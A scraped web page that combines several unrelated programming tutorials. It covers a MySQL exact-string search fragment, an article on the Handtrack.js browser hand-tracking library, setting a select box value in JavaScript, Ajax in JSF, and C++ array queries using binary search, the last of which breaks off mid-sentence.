|\n+----+---------+----------+\n4 rows in set (0.00 sec)" }, { "code": null, "e": 2501, "s": 2407, "text": "Here is the query to search for exact string in MySQL. We are searching for string “USER123”:" }, { "code": null, "e": 2566, "s": 2501, "text": "mysql> select *from ExactSearch where binary UserId = 'USER123';" }, { "code": null, "e": 2595, "s": 2566, "text": "The following is the output:" }, { "code": null, "e": 2759, "s": 2595, "text": "+----+---------+----------+\n| Id | UserId | UserName |\n+----+---------+----------+\n| 3 | USER123 | Bob |\n+----+---------+----------+\n1 row in set (0.00 sec)" } ]
Handtrack.js: Hand Tracking Interactions in the Browser using Tensorflow.js and 3 lines of code. | by Victor Dibia | Towards Data Science
Handtrack.js library allows you track a user’s hand (bounding box) from an image in any orientation, in 3 lines of code. A while ago, I was really blown away by results from an experiment using TensorFlow object detection api to track hands in an image. I made the trained model and source code available, and since then it has been used to prototype some rather interesting usecases (a tool to help kids spell, extensions to predict sign language, hand ping pong, etc). However, while many individuals wanted to experiment with the trained model, a large number still had issues setting up Tensorflow (installation, TF version issues, exporting graphs, etc). Luckily, Tensorflow.js addresses several of these installations/distribution issues, as it is optimized to run in the standardized environment of browsers. To this end, I created Handtrack.js as a library to allow developers quickly prototype hand/gesture interactions powered by a trained hand detection model. Runtime: 22 FPS. On a Macbook Pro 2018, 2.2 Ghz, Chrome browser. 13 FPS on a Macbook Pro 2014 2.2GHz. The goal of the library is to abstract away steps associated with loading the model files, provide helpful functions and allow a user detect hands in an image without any ML experience. You do not need to train a model (you can if you want). You do not need to export any frozen graphs or saved models. You can just get started by including handtrack.js in your web application (details below) and calling the library methods. Interactive demo built using Handtrack.js here, and the source code on GitHub is here. Love tinkering in Codepen? Here’s a handtrack.js example pen you can modify. github.com You can use handtrack.js simply by including the library URL in a script tag or by importing it from npm using build tools. The Handtrack.js minified js file is currently hosted using jsdelivr, a free open source cdn that lets you include any npm package in your web application. <script src="https://cdn.jsdelivr.net/npm/handtrackjs/dist/handtrack.min.js"> </script> Once the above script tag has been added to your html page, you can reference handtrack.js using the handTrack variable as follows. const img = document.getElementById('img'); handTrack.load().then(model => { model.detect(img).then(predictions => { console.log('Predictions: ', predictions) // bbox predictions });}); The snippet above prints out bounding box predictions for an image passed in via the img tag. By submitting frames from a video or camera feed, you can then “track” hands in each frame (you will need to keep state of each hand as frames progress). You can install handtrack.js as an npm package using the following npm install --save handtrackjs An example of how you can import and use it in a React app is given below. import * as handTrack from 'handtrackjs';const img = document.getElementById('img');// Load the model.handTrack.load().then(model => { // detect objects in the image. console.log("model loaded") model.detect(img).then(predictions => { console.log('Predictions: ', predictions); });}); If you are interested in prototyping gesture based (body as input) interactive experiences, Handtrack.js can be useful. The user does not need to attach any additional sensors or hardware but can immediately take advantage of engagement benefits that result from gesture based/body-as-input interactions. Some (not all) relevant scenarios are listed below: When mouse motion can be mapped to hand motion for control purposes. When an overlap of hand and other objects can represent meaningful interaction signals (e.g a touch or selection event for an object). Scenarios where the human hand motion can be a proxy for activity recognition (e.g. automatically tracking movement activity from a video or images of individuals playing chess, or tracking a persons golf swing). Or simply counting how many humans are present in an image or video frame. Interactive art installations. Could be a fun set of controls for interactive art installations. Teaching others about ML/AI. The handtrack.js libary provides a valuable interface to demonstrate how changes in the model parameters (confidence threshold, IoU threshold, image size etc) can affect detection results. You want an accessible demonstration that anyone can easily run or tryout with minimal setup. Several methods are provided. The two main methods including the load() which loads a hand detection model and detect() method for getting predictions. load() accepts optional model parameters that allow you control the performance of the model. This method loads a pretrained hand detection model in the web model format (also hosted via jsdelivr). detect() accepts an input source parameter (a html img, video or canvas object) and returns bounding box predictions on the location of hands in the image. const modelParams = { flipHorizontal: true, // flip e.g for video imageScaleFactor: 0.7, // reduce input image size . maxNumBoxes: 20, // maximum number of boxes to detect iouThreshold: 0.5, // ioU threshold for non-max suppression scoreThreshold: 0.79, // confidence threshold for predictions.}const img = document.getElementById('img');handTrack.load(modelParams).then(model => { model.detect(img).then(predictions => { console.log('Predictions: ', predictions); });}); prediction results are of the form [{ bbox: [x, y, width, height], class: "hand", score: 0.8380282521247864}, { bbox: [x, y, width, height], class: "hand", score: 0.74644153267145157}] Other helper methods are also provided model.getFPS() : get FPS calculated as number of detections per second. model.renderPredictions(predictions, canvas, context, mediasource): draw bounding box (and the input mediasource image) on the specified canvas. model.getModelParameters(): returns model parameters. model.setModelParameters(modelParams): updates model parameters. dispose() : delete model instance startVideo(video) : start camera video stream on given video element. Returns a promise that can be used to validate if user provided video permission. stopVideo(video) : stop video stream. library size — 810kb. Mainly because it is bundled with the tensorflow.js library (theres some open issues with recent versions that break the library.) Models — 18.5mb. This is what causes the initial wait when the page is loaded. TF.js webmodels are typically sharded into multiple files (in this case four 4.2mb files and one 1.7 mb file.) Underneath, Handtrack.js uses the Tensorflow.js library — a flexible and intuitive APIs for building and training models from scratch in the browser. It provides a low-level JavaScript linear algebra library and a high-level layers API. The data used in this project is primarily from the Egohands dataset. This consists of 4800 images of the human hand with bounding box annotations in various settings (indoor, outdoor), captured using a Google glass device. A model is trained to detect hands using the Tensorflow Object Detection API. For this project, a Single Shot MultiBox Detector (SSD) was used with the MobileNetV2 Architecture. Results from the trained model were then exported as a savedmodel . Additional details on how the model was trained can be found here and on the Tensorflow Object Detection API github repo. Tensorflow.js provides a model conversion tool that allows you convert a savedmodel trained in Tensorflow python to the Tensorflow.js webmodel format that can be loaded in the browser. This process is mainly around mapping operations in Tensorflow python to their equivalent implementation in Tensorflow.js. It makes sense to inspect the saved model graph to understand what is being exported. Finally, I followed the suggestion by authors of the Tensorflow coco-ssd example [2] in removing the post processing part of the object detection model graph during conversion. This optimization effectively doubled the runtime for the detection/prediction operation in the browser. The library was modeled after the tensorflowjs coco-ssd example (but not written in typescript). It consists of a main class with methods to load the model, detect hands in an image, and a set of other helpful functions e.g. startVideo, stopVideo, getFPS(), renderPredictions(), getModelParameters(), setModelParameters()etc. A full description of methods are on Github . The source file is then bundled using rollup.js, and published (with the webmodel files) on npm. This is particularly valuable as jsdelivr automatically provides a cdn for npm packages. (It might be the case that hosting the file on other CDNs might be faster and the reader is encouraged to try out other methods). At the moment handtrackjs is bundled with tensorflowjs (v0.13.5) mainly because as at the time of writing this library, there were version issues where tfjs (v0.15) had datatype errors loading image/video tags as tensors. As new versions fix this issue, it will be updated. Browsers are single threaded: What this means is that care must be taken to ensure prediction operations do not block the UI thread. Each prediction can take between 50 and 150ms which becomes noticeable to a user. For example when integrating Handtrack.js in an application where the entire screen is rendered (e.g. in a game) many times per second, I found it useful to reduce the number of predictions requested per second. In this scenario, Webworkers, an emergent standard which allow running scripts in a background thread will be useful in preventing UI blocks. Web Workers is a simple means for web content to run scripts in background threads. The worker thread can perform tasks without interfering with the user interface. In addition, they can perform I/O using XMLHttpRequest (although the responseXML and channel attributes are always null). Once created, a worker can send messages to the JavaScript code that created it by posting messages to an event handler specified by that code (and vice versa).This article provides a detailed introduction to using web workers. Hands are tracked on a frame by frame basis: If interested in identifying hands across frames, you will need to write additional code to infer the id’s of detected hands as they enter, move and leave successive frames. Hint: keeping state on location of each prediction (and euclidean distance) across each frame can help. Incorrect predictions: There will be the occasional incorrect prediction (sometimes a face is detected as a hand). I found that each camera and lighting condition needed different settings for the model parameters (especially confidence thresholds) to get good detection. More importantly, this can be improved with additional data. I really look forward to how others who use or extend this project solve some of these limitations. Handtrack.js represents really early steps with respect to the overall potential in enabling new forms of human computer interaction with AI. In the browser. Already, there have been excellent ideas such as posenet for human pose detection, and handsfree.js for facial expression detection in the browser. Above all, the reader is invited to imagine. Imagine interesting use cases where knowing the location of a users hand can make for more engaging interactions. In the meantime, I will be spending more time on the following Better handmodel: Creating a robust benchmark to evaluate the underlying hand model. Collecting additional data that improves accuracy and robustness metrics. Additional Vocabulary: As I worked through building the samples, one thing that becomes apparent is the limited vocabulary of this interaction method. There is clearly a need to support atleast one more state. Perhaps a fist and an open hand. This will mean re-labelling the dataset (or some semi supervised approaches). Additional model quantization: Right now, we are using the fastest model wrt architecture size and accuracy — MobilenetV2, SSD. Are there optimizations that can make things even faster? Any ideas or contributions here are welcome. If you would like to discuss this in more detail, feel free to reach out on Twitter, Github or Linkedin. Many thanks to Kesa Oluwafunmilola who helped with proof reading this article. [1] Sandler, Mark, et al. “Mobilenetv2: Inverted residuals and linear bottlenecks.” Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2018. https://arxiv.org/abs/1801.04381 [2] Tensorflow.js Coco-ssd example.This library uses code and guidance from the Tensorflow.js coco-ssd example which provides a library for object detection trained on the MSCOCO dataset. The optimizations suggested in the repo (stripping out a post processing layer) was really helpful (2x speedup).
[ { "code": null, "e": 292, "s": 171, "text": "Handtrack.js library allows you track a user’s hand (bounding box) from an image in any orientation, in 3 lines of code." }, { "code": null, "e": 1143, "s": 292, "text": "A while ago, I was really blown away by results from an experiment using TensorFlow object detection api to track hands in an image. I made the trained model and source code available, and since then it has been used to prototype some rather interesting usecases (a tool to help kids spell, extensions to predict sign language, hand ping pong, etc). However, while many individuals wanted to experiment with the trained model, a large number still had issues setting up Tensorflow (installation, TF version issues, exporting graphs, etc). Luckily, Tensorflow.js addresses several of these installations/distribution issues, as it is optimized to run in the standardized environment of browsers. To this end, I created Handtrack.js as a library to allow developers quickly prototype hand/gesture interactions powered by a trained hand detection model." }, { "code": null, "e": 1245, "s": 1143, "text": "Runtime: 22 FPS. On a Macbook Pro 2018, 2.2 Ghz, Chrome browser. 13 FPS on a Macbook Pro 2014 2.2GHz." }, { "code": null, "e": 1672, "s": 1245, "text": "The goal of the library is to abstract away steps associated with loading the model files, provide helpful functions and allow a user detect hands in an image without any ML experience. You do not need to train a model (you can if you want). You do not need to export any frozen graphs or saved models. You can just get started by including handtrack.js in your web application (details below) and calling the library methods." }, { "code": null, "e": 1836, "s": 1672, "text": "Interactive demo built using Handtrack.js here, and the source code on GitHub is here. Love tinkering in Codepen? Here’s a handtrack.js example pen you can modify." }, { "code": null, "e": 1847, "s": 1836, "text": "github.com" }, { "code": null, "e": 1971, "s": 1847, "text": "You can use handtrack.js simply by including the library URL in a script tag or by importing it from npm using build tools." }, { "code": null, "e": 2127, "s": 1971, "text": "The Handtrack.js minified js file is currently hosted using jsdelivr, a free open source cdn that lets you include any npm package in your web application." }, { "code": null, "e": 2215, "s": 2127, "text": "<script src=\"https://cdn.jsdelivr.net/npm/handtrackjs/dist/handtrack.min.js\"> </script>" }, { "code": null, "e": 2347, "s": 2215, "text": "Once the above script tag has been added to your html page, you can reference handtrack.js using the handTrack variable as follows." }, { "code": null, "e": 2546, "s": 2347, "text": "const img = document.getElementById('img'); handTrack.load().then(model => { model.detect(img).then(predictions => { console.log('Predictions: ', predictions) // bbox predictions });});" }, { "code": null, "e": 2794, "s": 2546, "text": "The snippet above prints out bounding box predictions for an image passed in via the img tag. By submitting frames from a video or camera feed, you can then “track” hands in each frame (you will need to keep state of each hand as frames progress)." }, { "code": null, "e": 2861, "s": 2794, "text": "You can install handtrack.js as an npm package using the following" }, { "code": null, "e": 2892, "s": 2861, "text": "npm install --save handtrackjs" }, { "code": null, "e": 2967, "s": 2892, "text": "An example of how you can import and use it in a React app is given below." }, { "code": null, "e": 3260, "s": 2967, "text": "import * as handTrack from 'handtrackjs';const img = document.getElementById('img');// Load the model.handTrack.load().then(model => { // detect objects in the image. console.log(\"model loaded\") model.detect(img).then(predictions => { console.log('Predictions: ', predictions); });});" }, { "code": null, "e": 3565, "s": 3260, "text": "If you are interested in prototyping gesture based (body as input) interactive experiences, Handtrack.js can be useful. The user does not need to attach any additional sensors or hardware but can immediately take advantage of engagement benefits that result from gesture based/body-as-input interactions." }, { "code": null, "e": 3617, "s": 3565, "text": "Some (not all) relevant scenarios are listed below:" }, { "code": null, "e": 3686, "s": 3617, "text": "When mouse motion can be mapped to hand motion for control purposes." }, { "code": null, "e": 3821, "s": 3686, "text": "When an overlap of hand and other objects can represent meaningful interaction signals (e.g a touch or selection event for an object)." }, { "code": null, "e": 4109, "s": 3821, "text": "Scenarios where the human hand motion can be a proxy for activity recognition (e.g. automatically tracking movement activity from a video or images of individuals playing chess, or tracking a persons golf swing). Or simply counting how many humans are present in an image or video frame." }, { "code": null, "e": 4206, "s": 4109, "text": "Interactive art installations. Could be a fun set of controls for interactive art installations." }, { "code": null, "e": 4424, "s": 4206, "text": "Teaching others about ML/AI. The handtrack.js libary provides a valuable interface to demonstrate how changes in the model parameters (confidence threshold, IoU threshold, image size etc) can affect detection results." }, { "code": null, "e": 4518, "s": 4424, "text": "You want an accessible demonstration that anyone can easily run or tryout with minimal setup." }, { "code": null, "e": 4670, "s": 4518, "text": "Several methods are provided. The two main methods including the load() which loads a hand detection model and detect() method for getting predictions." }, { "code": null, "e": 4868, "s": 4670, "text": "load() accepts optional model parameters that allow you control the performance of the model. This method loads a pretrained hand detection model in the web model format (also hosted via jsdelivr)." }, { "code": null, "e": 5024, "s": 4868, "text": "detect() accepts an input source parameter (a html img, video or canvas object) and returns bounding box predictions on the location of hands in the image." }, { "code": null, "e": 5528, "s": 5024, "text": "const modelParams = { flipHorizontal: true, // flip e.g for video imageScaleFactor: 0.7, // reduce input image size . maxNumBoxes: 20, // maximum number of boxes to detect iouThreshold: 0.5, // ioU threshold for non-max suppression scoreThreshold: 0.79, // confidence threshold for predictions.}const img = document.getElementById('img');handTrack.load(modelParams).then(model => { model.detect(img).then(predictions => { console.log('Predictions: ', predictions); });});" }, { "code": null, "e": 5563, "s": 5528, "text": "prediction results are of the form" }, { "code": null, "e": 5719, "s": 5563, "text": "[{ bbox: [x, y, width, height], class: \"hand\", score: 0.8380282521247864}, { bbox: [x, y, width, height], class: \"hand\", score: 0.74644153267145157}]" }, { "code": null, "e": 5758, "s": 5719, "text": "Other helper methods are also provided" }, { "code": null, "e": 5830, "s": 5758, "text": "model.getFPS() : get FPS calculated as number of detections per second." }, { "code": null, "e": 5975, "s": 5830, "text": "model.renderPredictions(predictions, canvas, context, mediasource): draw bounding box (and the input mediasource image) on the specified canvas." }, { "code": null, "e": 6029, "s": 5975, "text": "model.getModelParameters(): returns model parameters." }, { "code": null, "e": 6094, "s": 6029, "text": "model.setModelParameters(modelParams): updates model parameters." }, { "code": null, "e": 6128, "s": 6094, "text": "dispose() : delete model instance" }, { "code": null, "e": 6280, "s": 6128, "text": "startVideo(video) : start camera video stream on given video element. Returns a promise that can be used to validate if user provided video permission." }, { "code": null, "e": 6318, "s": 6280, "text": "stopVideo(video) : stop video stream." }, { "code": null, "e": 6471, "s": 6318, "text": "library size — 810kb. Mainly because it is bundled with the tensorflow.js library (theres some open issues with recent versions that break the library.)" }, { "code": null, "e": 6661, "s": 6471, "text": "Models — 18.5mb. This is what causes the initial wait when the page is loaded. TF.js webmodels are typically sharded into multiple files (in this case four 4.2mb files and one 1.7 mb file.)" }, { "code": null, "e": 6898, "s": 6661, "text": "Underneath, Handtrack.js uses the Tensorflow.js library — a flexible and intuitive APIs for building and training models from scratch in the browser. It provides a low-level JavaScript linear algebra library and a high-level layers API." }, { "code": null, "e": 7122, "s": 6898, "text": "The data used in this project is primarily from the Egohands dataset. This consists of 4800 images of the human hand with bounding box annotations in various settings (indoor, outdoor), captured using a Google glass device." }, { "code": null, "e": 7490, "s": 7122, "text": "A model is trained to detect hands using the Tensorflow Object Detection API. For this project, a Single Shot MultiBox Detector (SSD) was used with the MobileNetV2 Architecture. Results from the trained model were then exported as a savedmodel . Additional details on how the model was trained can be found here and on the Tensorflow Object Detection API github repo." }, { "code": null, "e": 8166, "s": 7490, "text": "Tensorflow.js provides a model conversion tool that allows you convert a savedmodel trained in Tensorflow python to the Tensorflow.js webmodel format that can be loaded in the browser. This process is mainly around mapping operations in Tensorflow python to their equivalent implementation in Tensorflow.js. It makes sense to inspect the saved model graph to understand what is being exported. Finally, I followed the suggestion by authors of the Tensorflow coco-ssd example [2] in removing the post processing part of the object detection model graph during conversion. This optimization effectively doubled the runtime for the detection/prediction operation in the browser." }, { "code": null, "e": 8538, "s": 8166, "text": "The library was modeled after the tensorflowjs coco-ssd example (but not written in typescript). It consists of a main class with methods to load the model, detect hands in an image, and a set of other helpful functions e.g. startVideo, stopVideo, getFPS(), renderPredictions(), getModelParameters(), setModelParameters()etc. A full description of methods are on Github ." }, { "code": null, "e": 9128, "s": 8538, "text": "The source file is then bundled using rollup.js, and published (with the webmodel files) on npm. This is particularly valuable as jsdelivr automatically provides a cdn for npm packages. (It might be the case that hosting the file on other CDNs might be faster and the reader is encouraged to try out other methods). At the moment handtrackjs is bundled with tensorflowjs (v0.13.5) mainly because as at the time of writing this library, there were version issues where tfjs (v0.15) had datatype errors loading image/video tags as tensors. As new versions fix this issue, it will be updated." }, { "code": null, "e": 9697, "s": 9128, "text": "Browsers are single threaded: What this means is that care must be taken to ensure prediction operations do not block the UI thread. Each prediction can take between 50 and 150ms which becomes noticeable to a user. For example when integrating Handtrack.js in an application where the entire screen is rendered (e.g. in a game) many times per second, I found it useful to reduce the number of predictions requested per second. In this scenario, Webworkers, an emergent standard which allow running scripts in a background thread will be useful in preventing UI blocks." }, { "code": null, "e": 10212, "s": 9697, "text": "Web Workers is a simple means for web content to run scripts in background threads. The worker thread can perform tasks without interfering with the user interface. In addition, they can perform I/O using XMLHttpRequest (although the responseXML and channel attributes are always null). Once created, a worker can send messages to the JavaScript code that created it by posting messages to an event handler specified by that code (and vice versa).This article provides a detailed introduction to using web workers." }, { "code": null, "e": 10535, "s": 10212, "text": "Hands are tracked on a frame by frame basis: If interested in identifying hands across frames, you will need to write additional code to infer the id’s of detected hands as they enter, move and leave successive frames. Hint: keeping state on location of each prediction (and euclidean distance) across each frame can help." }, { "code": null, "e": 10868, "s": 10535, "text": "Incorrect predictions: There will be the occasional incorrect prediction (sometimes a face is detected as a hand). I found that each camera and lighting condition needed different settings for the model parameters (especially confidence thresholds) to get good detection. More importantly, this can be improved with additional data." }, { "code": null, "e": 10968, "s": 10868, "text": "I really look forward to how others who use or extend this project solve some of these limitations." }, { "code": null, "e": 11274, "s": 10968, "text": "Handtrack.js represents really early steps with respect to the overall potential in enabling new forms of human computer interaction with AI. In the browser. Already, there have been excellent ideas such as posenet for human pose detection, and handsfree.js for facial expression detection in the browser." }, { "code": null, "e": 11433, "s": 11274, "text": "Above all, the reader is invited to imagine. Imagine interesting use cases where knowing the location of a users hand can make for more engaging interactions." }, { "code": null, "e": 11496, "s": 11433, "text": "In the meantime, I will be spending more time on the following" }, { "code": null, "e": 11655, "s": 11496, "text": "Better handmodel: Creating a robust benchmark to evaluate the underlying hand model. Collecting additional data that improves accuracy and robustness metrics." }, { "code": null, "e": 11976, "s": 11655, "text": "Additional Vocabulary: As I worked through building the samples, one thing that becomes apparent is the limited vocabulary of this interaction method. There is clearly a need to support atleast one more state. Perhaps a fist and an open hand. This will mean re-labelling the dataset (or some semi supervised approaches)." }, { "code": null, "e": 12207, "s": 11976, "text": "Additional model quantization: Right now, we are using the fastest model wrt architecture size and accuracy — MobilenetV2, SSD. Are there optimizations that can make things even faster? Any ideas or contributions here are welcome." }, { "code": null, "e": 12391, "s": 12207, "text": "If you would like to discuss this in more detail, feel free to reach out on Twitter, Github or Linkedin. Many thanks to Kesa Oluwafunmilola who helped with proof reading this article." }, { "code": null, "e": 12593, "s": 12391, "text": "[1] Sandler, Mark, et al. “Mobilenetv2: Inverted residuals and linear bottlenecks.” Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2018. https://arxiv.org/abs/1801.04381" } ]
How to programmatically set the value of a select box element using JavaScript?
We can set the value of a select box using Javascript using the following. Suppose we have the following select box − <select id="my-select" value="1"> <option value="1">Select</option> <option value="2">Apple</option> <option value="3">Strawberry</option> <option value="4">Cherry</option> <option value="5">Guava</option> </select> To set the value of this select element, we need to access it using querySelector. Then set the value. For example − // Search the select box const mySelectBox = document.querySelector('#my-select'); // Set the value to 3 or Strawberry mySelectBox.value = 3;
[ { "code": null, "e": 1180, "s": 1062, "text": "We can set the value of a select box using Javascript using the following. Suppose we have the following select box −" }, { "code": null, "e": 1411, "s": 1180, "text": "<select id=\"my-select\" value=\"1\">\n <option value=\"1\">Select</option>\n <option value=\"2\">Apple</option>\n <option value=\"3\">Strawberry</option>\n <option value=\"4\">Cherry</option>\n <option value=\"5\">Guava</option>\n</select>" }, { "code": null, "e": 1528, "s": 1411, "text": "To set the value of this select element, we need to access it using\nquerySelector. Then set the value. For example −" }, { "code": null, "e": 1670, "s": 1528, "text": "// Search the select box\nconst mySelectBox = document.querySelector('#my-select');\n// Set the value to 3 or Strawberry\nmySelectBox.value = 3;" } ]
JSF - Ajax
AJAX stands for Asynchronous JavaScript and Xml. Ajax is a technique to use HTTPXMLObject of JavaScript to send data to the server and receive data from the server asynchronously. Thus using Ajax technique, javascript code exchanges data with the server, updates parts of the web page without reloading the whole page. JSF provides execellent support for making ajax call. It provides f:ajax tag to handle ajax calls. <f:ajax execute = "input-component-name" render = "output-component-name" /> disabled If true, the Ajax behavior will be applied to any parent or child components. If false, the Ajax behavior will be disabled. Event The event that will invoke Ajax requests, for example "click", "change", "blur", "keypress", etc. Execute A space-separated list of IDs for components that should be included in the Ajax request. Immediate If "true" behavior events generated from this behavior are broadcast during Apply Request Values phase. Otherwise, the events will be broadcast during Invoke Applications phase. Listener An EL expression for a method in a backing bean to be called during the Ajax request. Onerror The name of a JavaScript callback function that will be invoked if there is an error during the Ajax request. Onevent The name of a JavaScript callback function that will be invoked to handle UI events. Render A space-separated list of IDs for components that will be updated after an Ajax request. Let us create a test JSF application to test the custom component in JSF. package com.tutorialspoint.test; import java.io.Serializable; import javax.faces.bean.ManagedBean; import javax.faces.bean.SessionScoped; @ManagedBean(name = "userData", eager = true) @SessionScoped public class UserData implements Serializable { private static final long serialVersionUID = 1L; private String name; public String getName() { return name; } public void setName(String name) { this.name = name; } public String getWelcomeMessage() { return "Hello " + name; } } <?xml version = "1.0" encoding = "UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns = "http://www.w3.org/1999/xhtml" xmlns:h = "http://java.sun.com/jsf/html" xmlns:f = "http://java.sun.com/jsf/core" xmlns:tp = "http://java.sun.com/jsf/composite/tutorialspoint"> <h:head> <title>JSF tutorial</title> </h:head> <h:body> <h2>Ajax Example</h2> <h:form> <h:inputText id = "inputName" value = "#{userData.name}"></h:inputText> <h:commandButton value = "Show Message"> <f:ajax execute = "inputName" render = "outputMessage" /> </h:commandButton> <h2><h:outputText id = "outputMessage" value = "#{userData.welcomeMessage != null ? userData.welcomeMessage : ''}" /></h2> </h:form> </h:body> </html> Once you are ready with all the changes done, let us compile and run the application as we did in JSF - First Application chapter. If everything is fine with your application, this will produce the following result. Enter the name and press the Show Message button. You will see the following result without page refresh/form submit. 37 Lectures 3.5 hours Chaand Sheikh Print Add Notes Bookmark this page
[ { "code": null, "e": 2001, "s": 1952, "text": "AJAX stands for Asynchronous JavaScript and Xml." }, { "code": null, "e": 2271, "s": 2001, "text": "Ajax is a technique to use HTTPXMLObject of JavaScript to send data to the server and receive data from the server asynchronously. Thus using Ajax technique, javascript code exchanges data with the server, updates parts of the web page without reloading the whole page." }, { "code": null, "e": 2370, "s": 2271, "text": "JSF provides execellent support for making ajax call. It provides f:ajax tag to handle ajax calls." }, { "code": null, "e": 2447, "s": 2370, "text": "<f:ajax execute = \"input-component-name\" render = \"output-component-name\" />" }, { "code": null, "e": 2456, "s": 2447, "text": "disabled" }, { "code": null, "e": 2580, "s": 2456, "text": "If true, the Ajax behavior will be applied to any parent or child components. If false, the Ajax behavior will be disabled." }, { "code": null, "e": 2586, "s": 2580, "text": "Event" }, { "code": null, "e": 2684, "s": 2586, "text": "The event that will invoke Ajax requests, for example \"click\", \"change\", \"blur\", \"keypress\", etc." }, { "code": null, "e": 2692, "s": 2684, "text": "Execute" }, { "code": null, "e": 2782, "s": 2692, "text": "A space-separated list of IDs for components that should be included in the Ajax request." }, { "code": null, "e": 2792, "s": 2782, "text": "Immediate" }, { "code": null, "e": 2970, "s": 2792, "text": "If \"true\" behavior events generated from this behavior are broadcast during Apply Request Values phase. Otherwise, the events will be broadcast during Invoke Applications phase." }, { "code": null, "e": 2979, "s": 2970, "text": "Listener" }, { "code": null, "e": 3065, "s": 2979, "text": "An EL expression for a method in a backing bean to be called during the Ajax request." }, { "code": null, "e": 3073, "s": 3065, "text": "Onerror" }, { "code": null, "e": 3183, "s": 3073, "text": "The name of a JavaScript callback function that will be invoked if there is an error during the Ajax request." }, { "code": null, "e": 3191, "s": 3183, "text": "Onevent" }, { "code": null, "e": 3276, "s": 3191, "text": "The name of a JavaScript callback function that will be invoked to handle UI events." }, { "code": null, "e": 3283, "s": 3276, "text": "Render" }, { "code": null, "e": 3372, "s": 3283, "text": "A space-separated list of IDs for components that will be updated after an Ajax request." }, { "code": null, "e": 3446, "s": 3372, "text": "Let us create a test JSF application to test the custom component in JSF." }, { "code": null, "e": 3977, "s": 3446, "text": "package com.tutorialspoint.test;\n\nimport java.io.Serializable;\n\nimport javax.faces.bean.ManagedBean;\nimport javax.faces.bean.SessionScoped;\n\n@ManagedBean(name = \"userData\", eager = true)\n@SessionScoped\npublic class UserData implements Serializable {\n private static final long serialVersionUID = 1L;\n private String name;\n \n public String getName() {\n return name;\n }\n \n public void setName(String name) {\n this.name = name;\n }\n\n public String getWelcomeMessage() {\n return \"Hello \" + name;\n }\n}" }, { "code": null, "e": 4902, "s": 3977, "text": "<?xml version = \"1.0\" encoding = \"UTF-8\"?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n\n<html xmlns = \"http://www.w3.org/1999/xhtml\"\n xmlns:h = \"http://java.sun.com/jsf/html\"\n xmlns:f = \"http://java.sun.com/jsf/core\"\n xmlns:tp = \"http://java.sun.com/jsf/composite/tutorialspoint\">\n \n <h:head>\n <title>JSF tutorial</title>\n </h:head>\n \n <h:body>\n <h2>Ajax Example</h2>\n \n <h:form>\n <h:inputText id = \"inputName\" value = \"#{userData.name}\"></h:inputText>\n <h:commandButton value = \"Show Message\">\n <f:ajax execute = \"inputName\" render = \"outputMessage\" />\n </h:commandButton>\n <h2><h:outputText id = \"outputMessage\"\n value = \"#{userData.welcomeMessage != null ?\n userData.welcomeMessage : ''}\"\n /></h2>\n </h:form>\n </h:body>\n</html>" }, { "code": null, "e": 5118, "s": 4902, "text": "Once you are ready with all the changes done, let us compile and run the application as we did in JSF - First Application chapter. If everything is fine with your application, this will produce the following result." }, { "code": null, "e": 5236, "s": 5118, "text": "Enter the name and press the Show Message button. You will see the following result without page refresh/form submit." }, { "code": null, "e": 5271, "s": 5236, "text": "\n 37 Lectures \n 3.5 hours \n" }, { "code": null, "e": 5286, "s": 5271, "text": " Chaand Sheikh" }, { "code": null, "e": 5293, "s": 5286, "text": " Print" }, { "code": null, "e": 5304, "s": 5293, "text": " Add Notes" } ]
Queries for greater than and not less than using C++
In this article, we are given a problem, we are given an array, and there are two types of queries we need to answer. Type 0 − we have to calculate the number of greater elements than or equal to x(given value). Type 1 − we have to calculate the number of strictly greater elements than x(given value). So here is a simple example − Input : arr[] = { 10, 15, 30 , 40, 45 } and Q = 3 Query 1: 0 50 Query 2: 1 40 Query 3: 0 30 Output : 0 1 3 Explanation: x = 50, q = 0 : No elements greater than or equal to 50. x = 40, q = 1 : 45 is greater than 40. x = 30, q = 0 : three elements 30, 40, 45 are greater than or equal to 30. We can use two different methods to find the solution. Firstly we will use the brute force solution and then check if it can work for higher constraints or not. If not, then we proceed to optimize our solution. In this approach, we will traverse through the array for all q queries and find the numbers that satisfy the given conditions. #include <bits/stdc++.h> using namespace std; void query(int *arr, int n, int type, int val) { int count = 0; // answer if(!type) { // when type 0 query is asked for(int i = 0; i < n; i++) { if(arr[i] >= val) count++; } } else { // when type 1 query is asked for(int i = 0; i < n; i++) { if(arr[i] > val) count++; } } cout << count << "\n"; } int main() { int ARR[] = { 10, 15, 30, 40, 45 }; int n = sizeof(ARR)/sizeof(ARR[0]); // size of our array query(ARR, n, 0, 50); // query 1 query(ARR, n, 1, 40); // query 2 query(ARR, n, 0, 30); // query 3 return 0; } 0 1 3 In the above approach, we are simply traversing through the array and calculating the answer for the queries; this approach is working for the given examples, but if we encounter higher constraint, this approach will fail as the overall time complexity of the program is O(N*Q) where N is the size of our array and Q is the number of queries so now we will optimize this approach such that it works for higher constraints as well. In this approach, we will be using binary search to find the upper bound and lower bound of the given value. We first sort our array using binary search and then apply our lower bound and upper bound functions accordingly. #include <bits/stdc++.h> using namespace std; void lowerbound(int *arr, int n, int val) { int l = -1, r = n; while(r - l > 1) { // binary searching the answer int mid = (l+r)/2; if(arr[mid] >= val) r = mid; else l = mid; } if(r == n) // if r is unmoved then it means there is no element that satisfy the condition cout << "0\n"; else cout << n - r << "\n"; } void upperbound(int *arr, int n, int val) { int l = -1, r = n; while(r - l > 1) { // binary searching the answer int mid = (l+r)/2; if(arr[mid] > val) r = mid; else l = mid; } if(r == n)// if r is unmoved then it means there is no element that satisfy the condition cout << "0\n"; else cout << n - r <<"\n"; } void query(int *arr, int n, int type, int val) { if(!type) // if type == 0 we call lower bound function lowerbound(arr, n, val); else // if type == 1 we call upperbound function upperbound(arr, n, val); } int main() { int arr[] = { 1, 2, 3, 4 }; int n = sizeof(arr)/sizeof(arr[0]); // size of our array sort(arr, arr+n); // sorting the array query(arr, n, 0, 5); // query 1 query(arr, n, 1, 3); // query 2 query(arr, n, 0, 3); // query 3 return 0; } 0 1 2 The above code works on a binary search that decreases our time complexity substantially. Thus our final complexity becomes 